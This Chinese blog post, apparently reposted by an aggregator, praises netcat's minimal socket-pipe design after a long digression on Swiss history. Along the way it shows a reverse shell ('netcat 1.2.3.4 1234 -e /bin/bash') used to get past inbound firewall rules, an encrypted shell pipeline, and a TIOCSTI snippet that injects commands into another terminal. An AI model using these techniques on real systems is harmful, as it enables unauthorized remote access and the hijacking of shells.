网络工具的瑞士军刀netcat

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了网络工具的瑞士军刀netcat相关的知识,希望对你有一定的参考价值。

这是一个聒噪的夜晚,假设要给出个原因。可能是由于尽管我认为西班牙不纯粹,可是怎么也不至于干为人家搭台面自己不唱戏的角色吧..结束以后。我认为该玩一下素有网络瑞士军刀之称谓的netcat了。

尽管瑞士军刀和netcat除了在小而精方面之外并没有必定的联系,可是我还是想扯一通我所了解的瑞士,博客嘛。不是论文,不是測试报告,发散一点没有问题,而且,我认为将来。跨界将是一个必定的趋势,拥有跨界的能力也是一个必定的优势。


       瑞士是一个没有历史的国家,它全然就是1848年的政治妥协的结果,这也说明了为什么即便是纳粹德国也认可它永久中立国的地位,可是并不意味着生活在这片土地的民族没有历史。自凯撒时代以远。这里就生活着自由的民族。罗马化时代,它处在高卢和平氛围之下自我发展。之后它的历史就是一部融合,分离,抗争与中立的历史了,可是不可否认的是,这片土地以及这片土地上的人们在纷乱的中世纪大领主。国王。神罗皇帝,教皇。主教,自治市...之间的激烈混战中存活了下来,并没有变成废墟。直到如今。这里依然是实际上最富裕的地区之中的一个,看看地图就知道。和比利时,荷兰不同。瑞士处在一个大国的包围圈中。法国。德国。意大利。奥地利四强构成了瑞士的邻国。从它的语言上能够看出来它的历史。德语。法语,意大利语(为什么没有奥地利语呢?由于奥地利大部分人说德语,神罗后遗症),这样的地位正恰恰符合欧洲均势原则。所以瑞士反而能够毫发未损地作为中立国躲过N次浩劫,正是欧洲均势原则,为瑞士这样的国家创造了一个稳定的外部环境,它能够将设计精细化,能够不为外部压力而妥协,瑞士军刀就是在这样的环境下打造的。当然,还有手表。

可是假设再来点别的什么就更够味儿了。
       什么呢?那就是北欧基因。

我要是说是北欧基因促成了Linux,你信吗?但无论怎样。北欧基因确实起了作用。北欧人,一个纯粹的海洋民族的后裔,一个和罗马帝国无关的民族的后裔。挣脱了欧洲传统的羁绊。远离了历史遗留的纷争,他们生活在一个童话和神话的世界。驾驭着深不可測的海洋,自由摇摆着灵活和自由以及规则的原始冲动,这或许是海洋民族的最大特质。


       瑞士军刀。一个带有北欧基因的超级小工具,符合其外在自洽内部发散的哲学,怎么形容它的优美都只是分。北欧的基因表现型。加上小而精的追求。正是这样的特质给瑞士军刀营造了和Linux同样的氛围......当然物尽所用并不意味着它是万能的。你不能指望用它来割断起重机的钢丝绳,也不要幻想它能撬起一辆卡车。其实。这些功能的缺失却正是瑞士军刀的优美之处,即它不是大而全,而是小而精,有时候,小而精的哲学确实能取胜。评价一个工具的标准并非它能做什么,而是它能多么简单地做到它声称能够做的事。手里拿着一个瑞士军刀,你能够省去带非常多东西,其实不论什么小工具都能够内置当中。比方温度计。指南针。剪刀,起子,螺丝刀,U盘,电表,牙签。绕线圈...设计的精妙之处在于,怎样把这些东西放在一个有限的空间中,以及怎样不被人们误用这些功能,简单的方式就是每一个小工具仅仅完美实现一个功能。

好吧。这就是瑞士军刀的全部,以下就是netcat了。
       netcat,非常小非常小,而且是真的小,而不是表现的小,它不像Linux内核那样,有人声称它能够被裁减到不到xk。可是你知道这个裁减的人要付出多大的心血吗?假设换一个刚毕业不久辛苦求得一份工作的人来裁减。他可能仅仅是大学期间看过一些代码,那他要加多少班啊。

好东西不在于它能被裁到多小,而是在于它真的不能再小了。netcat能小到什么程度呢?实际上它仅仅提供了一个socket IO通道而已,但别看它自带的这么小的功能集合。甚至都不能称之为集合,它却把扩展的范围提升到了你的想象力所及的范围,对于不善于思考的人来讲。它或许仅仅是一个telnet一样的程序,可是对于善于思考的人来讲。它能够构建一个安全的远程shell。你想过用它来构建一个SSL通道吗?
       在開始我的探索之前,首先简要概览一下能够从网上搜到的netcat的功能,我这里就不再反复了,它的功能点包含但不限于:探測port是否开启,port扫描,远程复制文件。远程复制文件夹,加密传输数据,远程运行shell,反向远程shell...为什么如此小的netcat能完毕这么多的功能呢?
       原因在于,它仅仅提供了最小集,即一个IO通道而已。至于说怎样构建数据,那不是它的职责,netcat并不假设数据的不论什么格式。对数据没有不论什么约束,这一点和telnet不同,尽管telnet也是一个略微通用些的TCP測试程序,可是对于传输数据它有非常多格式规定和假设,毕竟它最開始就是为远程登录设计的,其实上述的功能差点儿都不是netcat完毕的,netcat仅仅是把传输数据到对端而已,仅此而已。这是个创举!

试想,究竟是谁规定一个远程的telnet 23或者ssh必须是TCP的client主动发起连接TCP服务端呢?即究竟凭什么sshd要运行在TCP服务端呢?其实,没有人规定。仅仅是一个远程登录而已。但就是这个实现上的默认行为。导致了非常多远程登录无法进行,由于这些远程登录是从外网到内网的。而非常多防火墙都不同意从外到内的主动訪问。使用netcat能够做到这一点,在内网运行一个netcatclient,在外网运行netcat服务端。然后让/bin/bash覆盖掉netcat就可以,这就是创举所在。我来说下why。


       假设你运行一个netcat -e $pro。那么在连接成功后,你以为netcat会像大多数程序一样调用fork/exec来运行pro吗?非常多人都会这么认为,由于这是UNIX传统的标准做法。可是netcat没有这么做,而是直接在当前的netcat进程exec一个pro。这太猛了。当前的netcat就此消失被pro覆盖,那么接下来怎么办?谁来进行主控?其实。netcat就此就把控制权全然交给了pro。在交接之前。把STDIN,STDOUT,STDERR重定向到自己的socket。仅此而已。netcat留下的就是一个socket IO通道。接下来的pro程序的STDIN。STDOUT,STDERR就是socket了。除此之外。netcat没有留下不论什么痕迹,在运行netcat 1.2.3.4 1234 -e /bin/bash的时候,言外之意就好像在运行/bin/bash socketstdin socketstdout...仅仅可惜UNIX哲学不同意/bin/bash这样的程序和socket有不论什么关联。那么仅仅好利用另外一个小程序和它组合从而在网络上模拟本地IO了,netcat在-e參数下除了干这个,没有不论什么毒副作用。假设你不想全然将STDIN,STDOUT。STDERR都重定向,比方你仅仅想重定向STDIN。那么你就能够将|,>,<等符号和netcat组合,比方netcat -l -p 1234 <./transfile。cat transfile2 |netcat 127.0.0.1 2234等,在这样的情况下,netcat本身还在,并没有在-e參数下那样消失。可是它除了做IO之外。什么都不会多做。瑞士军刀般的多样化功能就是这么来的。是的。一切都在于你的想象力,你再也不能说,这个功能或者那个功能netcat没有提供,不能这样说,应该说你自己没有想到它能怎么用。假设让我写netcat的手冊,我就写一句话:它提供且仅仅提供一个TCP或者UDP网络通道。它能实现全部使用TCP或者UDP协议的的网络功能。


       我想实现一个远程运行命令的机制,不想编程。也不想用ssh,怎么办呢?使用netcat非常好办,首先它能够实现一个DH密钥交换,然后加密要传输的数据。然后解密,即兴创建一个shell,运行命令后返回结果。加密返回,这些都不在话下。假设你想远程获得一个加密的shell,就须要做一些工作了,要么你实现一个自环管道。即命令序列的最后一个的标准输出定向到第一个命令的标准输入,即netcat 1.2.3.4 1234|decryto|/bin/bash|[email protected],最后的@意味着encryto的标准输出定向到netcat的标准输入,即socket,假设不想这么做。那就你就用以下的代码序列劫持不论什么一个已经处在tty上运行的shell然后运行命令后捕获返回值返回:

int fd = open("/dev/pts/0", O_RDWR);
ioctl(fd,   TIOCSTI,   "l ");
ioctl(fd,   TIOCSTI,   "s ");
ioctl(fd,   TIOCSTI,   "\n ");
可是无论你怎么做,千万不要改动netcat。假设你真的想改动它,那还不如自己写一个满足自己需求的呢,由于netcat没什么好改的,你就把它当成以下的程序就可以:
socket;
listen
accept //注意。没有多处理机制
loop:
read;
write;
loop;
记住,用已有的小工具构建一个大功能是一种艺术,netcat本身不是瑞士军刀。它更像瑞士军刀的刀柄和刀鞘,能够容纳差点儿全部的工具,小即是多。关键在包容,大的包容性,自然约束是最少的。netcat全然符合了UNIX的哲学。
       在网络编程工具上有没有瑞士军刀呢?我认为有,那就是OpenSSL的BIO机制。它抽象了IO过程,和netcat重定向了IO过程相似。假设说netcat在网络环境模拟了本机环境的话。那么BIO则能够在本机模拟网络环境。就OpenVPN而言。数据是直接写到BIO的。而不是直接写到socket的,这个和netcat的过程恰恰相反,在没有网络的环境下,想要调试网络程序。那么BIO就是利器了。
       早上六点多,西班牙已经输了一段时间,我本不是狂热的球迷,就是跟下风而已,据说明天的意大利VS英格兰会非常精彩。

以上是关于网络工具的瑞士军刀netcat的主要内容,如果未能解决你的问题,请参考以下文章

Netcat

netcat——文件传输

安全牛学习笔记常用工具-NETCAT

Netcat-NC 工具的使用

centos 7.2 netcat 安装以及使用

linux ncat命令